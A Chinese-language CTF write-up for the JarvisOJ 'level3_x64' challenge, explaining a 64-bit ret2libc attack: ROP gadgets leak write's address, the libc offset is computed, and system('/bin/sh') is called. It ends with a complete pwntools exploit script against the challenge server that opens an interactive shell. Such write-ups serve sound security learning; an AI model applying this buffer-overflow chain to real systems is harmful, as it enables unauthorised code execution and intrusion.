level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。
先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。
0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret
根据网上wp,gdb在read处下断,验证rdx在此时等于0x200,只要大于8就可以。对于这点,我是这么理解的:我们是在vul函数里写入数据的,读取数据时调用了read(0, &buf, 0x200uLL),将rdx赋值0x200,后面直接就溢出到我们构造的栈了,没有修改rdx寄存器的值了,所以不用修改。
此时遇到地址问题,卡了两天,发现应该是虚拟机的问题,装了系统。记一些命令:
查命令地址:readelf -a libc-2.19.so | grep " system@"
查字符串地质:strings -a -t x libc-2.19.so | grep "/bin/sh"
回到题目,那么直接构造payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
recv得到服务器函数地址write_addr。同理offset=write_addr-libc.symbols[‘write’]。
脚本:
from pwn import *
#context.log_level="debug"
elf=ELF("level3_x64")
write_plt=elf.symbols["write"]
write_got=elf.got["write"]
vul_addr=elf.symbols['vulnerable_function']
p=remote("pwn2.jarvisoj.com",9883)
p.recvuntil("Input:\n")
pop_rdi_addr=0x00000000004006b3 #0x00000000004006b3 : pop rdi ; ret
pop_rsi_r15_addr=0x00000000004006b1 #0x00000000004006b1 : pop rsi ; pop r15 ; ret
payload1='a'*0x88+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_r15_addr)+p64(write_got)+"junkjunk"+p64(write_plt)+p64(vul_addr)
p.sendline(payload1)
t=p.recv(8)
write_addr=u64(t[0:8])
print "write_addr="+hex(write_addr)
libc=ELF("libc-2.19.so")
offset=write_addr-libc.symbols["write"]
sys_addr=offset+libc.symbols["system"]
bin_addr=offset+libc.search("/bin/sh").next()
payload2='a'*0x88+p64(pop_rdi_addr)+p64(bin_addr)+p64(sys_addr)+"ret-addr"
p.sendline(payload2)
p.interactive()
p.close()